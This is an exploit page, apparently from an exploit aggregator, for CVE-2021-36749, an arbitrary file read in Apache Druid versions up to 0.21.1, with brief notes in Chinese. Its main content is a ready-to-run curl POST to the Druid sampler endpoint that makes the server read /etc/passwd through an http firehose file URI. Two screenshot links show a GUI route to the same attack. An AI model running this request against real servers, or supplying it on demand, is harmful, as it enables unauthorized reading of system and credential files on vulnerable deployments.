Exploit for Incorrect Authorization in Apache Druid CVE-2021-36749

## https://sploitus.com/exploit?id=395F89FA-BC73-5540-B89C-DDB560DADA92
# CVE-2021-36749
Apache Druid 任意文件读取

受影响版本：version <= 0.21.1

使用以下两种方式均可

## 命令行方式

```bash
curl http://127.0.0.1:8888/druid/indexer/v1/sampler?for=connect -H "Content-Type:application/json" -X POST -d "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}"
```

## 图形界面方式

![1](https://i.loli.net/2021/10/14/bj27OYBhLDQSUw4.png)

![2](https://i.loli.net/2021/10/14/rGORHBnSfoesXhA.png)